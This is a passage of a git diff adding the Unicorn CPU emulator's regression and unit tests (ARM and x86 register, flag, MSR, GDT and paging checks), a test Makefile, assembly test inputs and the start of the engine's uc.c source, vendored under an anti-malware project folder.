WrongRIPArm(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + mu.mem_map(0, 2 * 1024 * 1024) + # write machine code to be emulated to memory + mu.mem_write(0, binary1) + mu.reg_write(UC_ARM_REG_R13, 1 * 1024 * 1024) + # emu for maximum 1 instruction. + mu.emu_start(0, len(binary1), 0, 1) + self.assertEqual(0x48, mu.reg_read(UC_ARM_REG_R1)) + pos = mu.reg_read(UC_ARM_REG_R15) + self.assertEqual(0x2, pos) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py new file mode 100644 index 0000000..13dbd36 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/wrong_sp_arm.py @@ -0,0 +1,28 @@ +#!/usr/bin/python +# By Ryan Hileman, issue #16 + +from unicorn import * +from unicorn.arm_const import * +from unicorn.arm64_const import * + +import regress + +class WrongSPArm(regress.RegressTest): + + def test_32(self): + with self.assertRaises(UcError): + uc = Uc(UC_ARCH_ARM, UC_MODE_32) + uc.reg_write(UC_ARM_REG_SP, 4) + + def test_64(self): + uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + uc.reg_write(UC_ARM64_REG_SP, 4) + self.assertEqual(0x4, uc.reg_read(UC_ARM64_REG_SP)) + + def test_arm(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.reg_write(UC_ARM_REG_SP, 4) + self.assertEqual(0x4, uc.reg_read(UC_ARM_REG_SP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c new file mode 100644 index 0000000..d7d97b0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_16_segfault.c @@ -0,0 +1,22 @@ +#include + +#define BINARY "\x90" +#define MEMORY_SIZE 4 * 1024 +#define STARTING_ADDRESS 100 * 1024 + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(UC_ARCH_X86, UC_MODE_16, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, STARTING_ADDRESS, MEMORY_SIZE, UC_PROT_ALL); + if (uc_mem_write(uc, STARTING_ADDRESS, BINARY, sizeof(BINARY) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, STARTING_ADDRESS, STARTING_ADDRESS + sizeof(BINARY) - 1, 0, 20); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py new file mode 100644 index 0000000..7a40105 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_conditional_jump.py @@ -0,0 +1,39 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongConditionalPath(regress.RegressTest): + def test_eflags(self): + # 0: 4d 31 f6 xor r14, r14 + # 3: 45 85 f6 test r14d, r14d + # 6: 75 fe jne 0x6 + # 8: f4 hlt + CODE = 'M1\xf6E\x85\xf6u\xfe\xf4' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) + uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x246) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + + uc.emu_start(0x6000b0 + 6, 0, count=1) + + # Here's the original execution trace for this on qemu-user. + # + # $ SC='xor r14,r14; test r14d, r14d; jne $; hlt' + # $ asm --context amd64 --format elf $SC > example + # $ qemu-x86_64-static -d cpu,in_asm -singlestep ./test \ + # | grep -E 'RFL|^0x' + # 0x00000000006000b0: xor %r14,%r14 + # RIP=00000000006000b0 RFL=00000202 [-------] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b3: test %r14d,%r14d + # RIP=00000000006000b3 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b6: jne 0x6000b6 + # RIP=00000000006000b6 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + # 0x00000000006000b8: hlt + # RIP=00000000006000b8 RFL=00000246 [---Z-P-] CPL=3 II=0 A20=1 SMM=0 HLT=0 + self.assertEqual(0x6000b0 + 8, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py new file mode 100644 index 0000000..ca7c48d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_eflags.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongEFLAGS(regress.RegressTest): + def test_eflags(self): + # xor r14,r14 + CODE = 'M1\xf6' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_64) + uc.reg_write(U.x86_const.UC_X86_REG_RIP, 0x6000b0) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x200) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + uc.emu_start(0x6000b0, 0, count=1) + + + # Here's the original execution trace for this on actual hardware. + # + # (gdb) x/i $pc + # => 0x6000b0: xor %r14,%r14 + # (gdb) p/x $eflags + # $1 = 0x200 + # (gdb) p $eflags + # $2 = [ IF ] + # (gdb) si + # 0x00000000006000b3 in ?? () + # (gdb) p/x $eflags + # $3 = 0x246 + # (gdb) p $eflags + # $4 = [ PF ZF IF ] + + self.assertEqual(0x6000b3, uc.reg_read(U.x86_const.UC_X86_REG_RIP)) + self.assertEqual(0x246, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py new file mode 100644 index 0000000..37853c5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_64_msr.py @@ -0,0 +1,155 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from struct import pack + +import regress + + +CODE_ADDR = 0x40000 +CODE_SIZE = 0x1000 + +SCRATCH_ADDR = 0x80000 +SCRATCH_SIZE = 0x1000 + +SEGMENT_ADDR = 0x5000 +SEGMENT_SIZE = 0x1000 + + +FSMSR = 0xC0000100 +GSMSR = 0xC0000101 + + +def set_msr(uc, msr, value, scratch=SCRATCH_ADDR): + ''' + set the given model-specific register (MSR) to the given value. + this will clobber some memory at the given scratch address, as it emits some code. + ''' + # save clobbered registers + orax = uc.reg_read(UC_X86_REG_RAX) + ordx = uc.reg_read(UC_X86_REG_RDX) + orcx = uc.reg_read(UC_X86_REG_RCX) + orip = uc.reg_read(UC_X86_REG_RIP) + + # x86: wrmsr + buf = '\x0f\x30' + uc.mem_write(scratch, buf) + uc.reg_write(UC_X86_REG_RAX, value & 0xFFFFFFFF) + uc.reg_write(UC_X86_REG_RDX, (value >> 32) & 0xFFFFFFFF) + uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) + uc.emu_start(scratch, scratch+len(buf), count=1) + + # restore clobbered registers + uc.reg_write(UC_X86_REG_RAX, orax) + uc.reg_write(UC_X86_REG_RDX, ordx) + uc.reg_write(UC_X86_REG_RCX, orcx) + uc.reg_write(UC_X86_REG_RIP, orip) + + +def get_msr(uc, msr, scratch=SCRATCH_ADDR): + ''' + fetch the contents of the given model-specific register (MSR). + this will clobber some memory at the given scratch address, as it emits some code. + ''' + # save clobbered registers + orax = uc.reg_read(UC_X86_REG_RAX) + ordx = uc.reg_read(UC_X86_REG_RDX) + orcx = uc.reg_read(UC_X86_REG_RCX) + orip = uc.reg_read(UC_X86_REG_RIP) + + # x86: rdmsr + buf = '\x0f\x32' + uc.mem_write(scratch, buf) + uc.reg_write(UC_X86_REG_RCX, msr & 0xFFFFFFFF) + uc.emu_start(scratch, scratch+len(buf), count=1) + eax = uc.reg_read(UC_X86_REG_EAX) + edx = uc.reg_read(UC_X86_REG_EDX) + + # restore clobbered registers + uc.reg_write(UC_X86_REG_RAX, orax) + uc.reg_write(UC_X86_REG_RDX, ordx) + uc.reg_write(UC_X86_REG_RCX, orcx) + uc.reg_write(UC_X86_REG_RIP, orip) + + return (edx << 32) | (eax & 0xFFFFFFFF) + + +def set_gs(uc, addr): + ''' + set the GS.base hidden descriptor-register field to the given address. + this enables referencing the gs segment on x86-64. + ''' + return set_msr(uc, GSMSR, addr) + + +def get_gs(uc): + ''' + fetch the GS.base hidden descriptor-register field. + ''' + return get_msr(uc, GSMSR) + + +def set_fs(uc, addr): + ''' + set the FS.base hidden descriptor-register field to the given address. + this enables referencing the fs segment on x86-64. + ''' + return set_msr(uc, FSMSR, addr) + + +def get_fs(uc): + ''' + fetch the FS.base hidden descriptor-register field. + ''' + return get_msr(uc, FSMSR) + + +class TestGetSetMSR(regress.RegressTest): + def test_msr(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + set_msr(uc, FSMSR, 0x1000) + self.assertEqual(0x1000, get_msr(uc, FSMSR)) + + set_msr(uc, GSMSR, 0x2000) + self.assertEqual(0x2000, get_msr(uc, GSMSR)) + + def test_gs(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + + uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) + uc.mem_map(CODE_ADDR, CODE_SIZE) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + code = '6548330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr gs:[0x18] + uc.mem_write(CODE_ADDR, code) + uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') + + set_gs(uc, SEGMENT_ADDR) + self.assertEqual(SEGMENT_ADDR, get_gs(uc)) + + uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) + + self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) + + def test_fs(self): + uc = Uc(UC_ARCH_X86, UC_MODE_64) + + uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) + uc.mem_map(CODE_ADDR, CODE_SIZE) + uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) + + code = '6448330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr fs:[0x18] + uc.mem_write(CODE_ADDR, code) + uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') + + set_fs(uc, SEGMENT_ADDR) + self.assertEqual(SEGMENT_ADDR, get_fs(uc)) + + uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) + + self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py new file mode 100644 index 0000000..486f6d0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_eflags.py @@ -0,0 +1,38 @@ +#!/usr/bin/python +import regress +import unicorn as U + +class WrongEFLAGS2(regress.RegressTest): + def test_eflags(self): + # imul eax, ebx + CODE = '\x0f\xaf\xc3' + + uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_32) + uc.reg_write(U.x86_const.UC_X86_REG_EAX, 16) + uc.reg_write(U.x86_const.UC_X86_REG_EBX, 1) + uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x292) + + uc.mem_map(0x600000, 0x1000) + uc.mem_write(0x6000b0, CODE) + uc.emu_start(0x6000b0, 0, count=1) + + + # Here's the original execution trace for this on actual hardware. + # + # (gdb) x/i $eip + # => 0x804aae5: imul eax,DWORD PTR [ebp-0x8] + # (gdb) p/x $eax + # $2 = 0x10 + # (gdb) x/wx $ebp-8 + # 0xbaaaad4c: 0x00000001 + # (gdb) p/x $eflags + # $3 = 0x292 + # (gdb) si + # 0x0804aae9 in ?? () + # (gdb) p/x $eflags + # $4 = 0x202 + + self.assertEqual(0x202, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py new file mode 100644 index 0000000..036ba33 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_fldt_fsqrt.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from struct import pack + +import regress + +CODE_ADDR = 0x1000000 +CODE = ( + '\xb8\x00\x00\x00\x02' # mov eax, 0x2000000 + '\xdb\x28' # fldt [eax] + '\xd9\xfa' # fsqrt +) + +DATA_ADDR = 0x2000000 +DATA = '\0\0\0\0\0\0\0\0\0\1' + +class FldtFsqrt(regress.RegressTest): + def test_fldt_fsqrt(self): + uc = Uc(UC_ARCH_X86, UC_MODE_32) + + uc.mem_map(CODE_ADDR, 0x1000) + uc.mem_write(CODE_ADDR, CODE) + + uc.mem_map(DATA_ADDR, 0x1000) + uc.mem_write(DATA_ADDR, DATA) + + uc.emu_start(CODE_ADDR, CODE_ADDR + len(CODE), 10000, 10) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py new file mode 100644 index 0000000..5f4234a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/x86_gdt.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python +from unicorn import * +from unicorn.x86_const import * +from struct import pack + +import regress + +F_GRANULARITY = 0x8 +F_PROT_32 = 0x4 +F_LONG = 0x2 +F_AVAILABLE = 0x1 + +A_PRESENT = 0x80 + +A_PRIV_3 = 0x60 +A_PRIV_2 = 0x40 +A_PRIV_1 = 0x20 +A_PRIV_0 = 0x0 + +A_CODE = 0x10 +A_DATA = 0x10 +A_TSS = 0x0 +A_GATE = 0x0 + +A_DATA_WRITABLE = 0x2 +A_CODE_READABLE = 0x2 + +A_DIR_CON_BIT = 0x4 + +S_GDT = 0x0 +S_LDT = 0x4 +S_PRIV_3 = 0x3 +S_PRIV_2 = 0x2 +S_PRIV_1 = 0x1 +S_PRIV_0 = 0x0 + +CODE = '65330d18000000'.decode('hex') # xor ecx, dword ptr gs:[0x18] + +def create_selector(idx, flags): + to_ret = flags + to_ret |= idx << 3 + return to_ret + +def create_gdt_entry(base, limit, access, flags): + + to_ret = limit & 0xffff; + to_ret |= (base & 0xffffff) << 16; + to_ret |= (access & 0xff) << 40; + to_ret |= ((limit >> 16) & 0xf) << 48; + to_ret |= (flags & 0xff) << 52; + to_ret |= ((base >> 24) & 0xff) << 56; + return pack(' +#include + + +#define OK(x) {uc_err __err; if ((__err = x)) { fprintf(stderr, "%s", uc_strerror(__err)); assert(false); } } +static void test_vmovdqu(void) +{ + uc_engine *uc; + + int r_esi = 0x1234; + int r_edi = 0x7890; + + uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; + + /* 128 bit at address esi (0x1234) this should not be read into xmm0 */ + char mem_esi[] = { '\xE7', '\x1D', '\xA7', '\xE8', '\x88', '\xE4', '\x94', '\x40', '\x54', '\x74', '\x24', '\x97', '\x1F', '\x2E', '\xB6', '\x40' }; + + /* 128 bit at address edi (0x7890) this SHOULD be read into xmm0 */ + char mem_edi[] = { '\xAD', '\xFA', '\x5C', '\x6D', '\x45', '\x4A', '\x93', '\x40', '\xD2', '\x00', '\xDE', '\x02', '\x89', '\xE8', '\x94', '\x40' }; + + /* vmovdqu xmm0, [edi] */ + char code[] = { '\xC5', '\xFA', '\x6F', '\x07' }; + + /* initialize memory and run emulation */ + OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); + OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); + + OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); + + // initialize machine registers; + OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); + + OK(uc_reg_write(uc, UC_X86_REG_ESI, &r_esi)); + OK(uc_reg_write(uc, UC_X86_REG_EDI, &r_edi)); + OK(uc_mem_write(uc, r_esi, mem_esi, sizeof(mem_esi) / sizeof(mem_esi[0]))); + OK(uc_mem_write(uc, r_edi, mem_edi, sizeof(mem_edi) / sizeof(mem_edi[0]))); + + OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); + + /* Read xmm0 after emulation */ + OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); + + + assert(0x4094e88902de00d2 == r_xmm0[0] && 0x40934a456d5cfaad == r_xmm0[1]); + + OK(uc_close(uc)); +} + + +/* TODO: Add more vex prefixed instructions + Suggestions: vxorpd, vxorps, vandpd, ... */ +int main(int argc, char **argv, char **envp) +{ + test_vmovdqu(); + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore b/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore new file mode 100644 index 0000000..d40da5f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/.gitignore @@ -0,0 +1,3 @@ +!*.c +test_* +*.bin diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile new file mode 100644 index 0000000..c0704d3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/Makefile @@ -0,0 +1,65 @@ +CFLAGS += -Wall -Werror -Wno-unused-function -g +CFLAGS += -D__USE_MINGW_ANSI_STDIO=1 +CFLAGS += -L ../../ -I ../../include +CFLAGS += -L ../../cmocka/src -I ../../cmocka/include +CFLAGS += -L /usr/local/lib -I /usr/local/include +ASFLAGS += --32 +OBJCOPY = objcopy + +UNAME_S := $(shell uname -s) +UNAME_M := $(shell uname -m) +LDLIBS += -pthread +ifeq ($(UNAME_S), Linux) +LDLIBS += -lrt +else ifeq ($(UNAME_S), Darwin) +OBJCOPY = gobjcopy +ASFLAGS = -arch i386 +endif + +LDLIBS += -lcmocka -lunicorn + +EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../ + +ifeq ($(UNICORN_ASAN),yes) +CC = clang -fsanitize=address -fno-omit-frame-pointer +CXX = clang++ -fsanitize=address -fno-omit-frame-pointer +AR = llvm-ar +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +ALL_TESTS_SOURCES = $(wildcard *.c) +TEST_ASSEMBLY = $(wildcard *.s) +TEST_PROGS = $(TEST_ASSEMBLY:%.s=%.o) +TEST_BINS = $(TEST_PROGS:%.o=%.bin) +ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) + +ifneq (,$(findstring x86,$(UNAME_M))) +ALL_TESTS += $(TEST_BINS) +endif + +.PHONY: all +all: ${ALL_TESTS} + +.PHONY: clean +clean: + rm -rf ${ALL_TESTS} + +%.bin: %.o + ${OBJCOPY} -O binary $^ $@ + hexdump -C $@ + +.PHONY: test +test: all + ${EXECUTE_VARS} ./test_sanity + ${EXECUTE_VARS} ./test_x86 + ${EXECUTE_VARS} ./test_mem_map + ${EXECUTE_VARS} ./test_mem_map_ptr + ${EXECUTE_VARS} ./test_mem_high + ${EXECUTE_VARS} ./test_multihook + ${EXECUTE_VARS} ./test_pc_change + ${EXECUTE_VARS} ./test_hookcounts + echo "skipping test_tb_x86" + echo "skipping test_x86_soft_paging" + echo "skipping test_hang" + echo "skipping test_x86_sh1_enter_leave" + echo "skipping test_x86_rip_bug" diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s new file mode 100644 index 0000000..42e2462 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s @@ -0,0 +1,3 @@ +.text +sidt (esp) +sgdt (esp+6) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s new file mode 100644 index 0000000..de92144 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s @@ -0,0 +1,6 @@ +dec %eax +mov (%eax), %eax +nop +nop +nop +nop diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s new file mode 100644 index 0000000..415e3cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s @@ -0,0 +1,9 @@ +.text +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %edx +inc %edx diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s new file mode 100644 index 0000000..8ef54c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s @@ -0,0 +1,90 @@ +mov %esp,%ecx +fxch %st(5) +fnstenv -0xc(%ecx) +pop %ebp +push %ebp +pop %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +aaa +push %ecx +pop %edx +push $0x41 +pop %eax +push %eax +xor %al,0x30(%ecx) +inc %ecx +imul $0x51,0x41(%ecx),%eax +xor 0x42(%ecx),%al +xor 0x42(%edx),%al +xor %al,0x42(%edx) +inc %ecx +inc %edx +pop %eax +push %eax +cmp %al,0x42(%ecx) +jne .+0x4c +dec %ecx +push %ecx +push %ecx +push %ecx +push %edx +inc %edi +xor 0x34(%edi),%eax +push %ecx +push %ebp +push %ecx +push %esi +push %eax +inc %edi +inc %edi +cmp %al,0x39(%edi) +push %eax +dec %edx +push %eax +dec %ebx +push %eax +dec %esp +push %eax +dec %ebp +push %eax +dec %esi +push %eax +dec %edi +push %eax +push %eax +push %eax +xor %eax, 0x42(%edi) +inc %edi +inc %edx +push %eax +xor $0x50,%al +pop %edx +push %eax +inc %ebp +push %ecx +push %edx +inc %esi +xor 0x31(%edi),%al +push %eax +dec %ebp +push %ecx +push %ecx +push %eax +dec %esi +inc %ecx +inc %ecx diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h b/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h new file mode 100644 index 0000000..fa695d9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h @@ -0,0 +1,57 @@ +#ifndef UNICORN_TEST_H +#define UNICORN_TEST_H + +#include +#include +#include +#include +#include +#include + +/** + * Assert that err matches expect + */ +#define uc_assert_err(expect, err) \ +do { \ + uc_err __err = err; \ + if (__err != expect) { \ + fail_msg("%s", uc_strerror(__err)); \ + } \ +} while (0) + +/** + * Assert that err is UC_ERR_OK + */ +#define uc_assert_success(err) uc_assert_err(UC_ERR_OK, err) + +/** + * Assert that err is anything but UC_ERR_OK + * + * Note: Better to use uc_assert_err(, err), + * as this serves to document which errors a function will return + * in various scenarios. + */ +#define uc_assert_fail(err) \ +do { \ + uc_err __err = err; \ + if (__err == UC_ERR_OK) { \ + fail_msg("%s", uc_strerror(__err)); \ + } \ +} while (0) + +char * read_file(const char *filename, struct stat *info) { + stat(filename, info); + char *code = malloc(info->st_size); + if (code == NULL) { + return NULL; + } + FILE *fp = fopen(filename, "r"); + if (fp == NULL) { + free(code); + return NULL; + } + fread(code, info->st_size, 1, fp); + return code; +} + +#endif /* UNICORN_TEST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s new file mode 100644 index 0000000..7b25745 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s @@ -0,0 +1,49 @@ +// Zero memory for page directories and page tables +mov $0x1000,%edi +mov $0x1000,%ecx +xor %eax,%eax +rep stos %eax,(%edi) + +// Load DWORD [0x4000] with 0xDEADBEEF to retrieve later +mov $0x4000,%edi +mov $0xBEEF,%eax +mov %eax, (%edi) + +// Identify map the first 4MiB of memory +mov $0x400,%ecx +mov $0x2000,%edi +mov $3, %eax +loop: +stos %eax,(%edi) +add $0x1000,%eax +loop loop + +// Map phyiscal address 0x4000 to cirtual address 0x7FF000 +mov $0x3ffc,%edi +mov $0x4003,%eax +mov %eax, (%edi) + +// Add page tables into page directory +mov $0x1000, %edi +mov $0x2003, %eax +mov %eax, (%edi) +mov $0x1004, %edi +mov $0x3003, %eax +mov %eax, (%edi) + +// Load the page directory register +mov $0x1000, %eax +mov %eax, %cr3 + +// Enable paging +mov %cr0, %eax +or $0x80000000, %eax + +// Clear EAX +mov %eax, %cr0 + +//Load using virtual memory address; EAX = 0xBEEF +xor %eax,%eax +mov $0x7FF000, %esi +mov (%esi), %eax +hlt diff --git a/ai_anti_malware/unicorn/unicorn-master/uc.c b/ai_anti_malware/unicorn/unicorn-master/uc.c new file mode 100644 index 0000000..eebce1f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/uc.c @@ -0,0 +1,1404 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#if defined(UNICORN_HAS_OSXKERNEL) +#include +#else +#include +#include +#include +#endif + +#include // nanosleep + +#include + +#include "uc_priv.h" + +// target specific headers +#include "qemu/target-m68k/unicorn.h" +#include "qemu/target-i386/unicorn.h" +#include "qemu/target-arm/unicorn.h" +#include "qemu/target-mips/unicorn.h" +#include "qemu/target-sparc/unicorn.h" + +#include "qemu/include/hw/boards.h" +#include "qemu/include/qemu/queue.h" + +static void free_table(gpointer key, gpointer value, gpointer data) +{ + TypeInfo *ti = (TypeInfo*) value; + g_free((void *) ti->class_); + g_free((void *) ti->name); + g_free((void *) ti->parent); + g_free((void *) ti); +} + +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor) +{ + if (major != NULL && minor != NULL) { + *major = UC_API_MAJOR; + *minor = UC_API_MINOR; + } + + return (UC_API_MAJOR << 8) + UC_API_MINOR; +} + + +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc) +{ + return uc->errnum; +} + + +UNICORN_EXPORT +const char *uc_strerror(uc_err code) +{ + switch(code) { + default: + return "Unknown error code"; + case UC_ERR_OK: + return "OK (UC_ERR_OK)"; + case UC_ERR_NOMEM: + return "No memory available or memory not present (UC_ERR_NOMEM)"; + case UC_ERR_ARCH: + return "Invalid/unsupported architecture (UC_ERR_ARCH)"; + case UC_ERR_HANDLE: + return "Invalid handle (UC_ERR_HANDLE)"; + case UC_ERR_MODE: + return "Invalid mode (UC_ERR_MODE)"; + case UC_ERR_VERSION: + return "Different API version between core & binding (UC_ERR_VERSION)"; + case UC_ERR_READ_UNMAPPED: + return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; + case UC_ERR_WRITE_UNMAPPED: + return "Invalid memory write (UC_ERR_WRITE_UNMAPPED)"; + case UC_ERR_FETCH_UNMAPPED: + return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; + case UC_ERR_HOOK: + return "Invalid hook type (UC_ERR_HOOK)"; + case UC_ERR_INSN_INVALID: + return "Invalid instruction (UC_ERR_INSN_INVALID)"; + case UC_ERR_MAP: + return "Invalid memory mapping (UC_ERR_MAP)"; + case UC_ERR_WRITE_PROT: + return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; + case UC_ERR_READ_PROT: + return "Read from non-readable memory (UC_ERR_READ_PROT)"; + case UC_ERR_FETCH_PROT: + return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; + case UC_ERR_ARG: + return "Invalid argument (UC_ERR_ARG)"; + case UC_ERR_READ_UNALIGNED: + return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; + case UC_ERR_WRITE_UNALIGNED: + return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; + case UC_ERR_FETCH_UNALIGNED: + return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; + case UC_ERR_RESOURCE: + return "Insufficient resource (UC_ERR_RESOURCE)"; + case UC_ERR_EXCEPTION: + return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; + } +} + + +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch) +{ + switch (arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return true; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return true; +#endif +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return true; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: return true; +#endif +#ifdef UNICORN_HAS_PPC + case UC_ARCH_PPC: return true; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return true; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return true; +#endif + /* Invalid or disabled arch */ + default: return false; + } +} + + +UNICORN_EXPORT 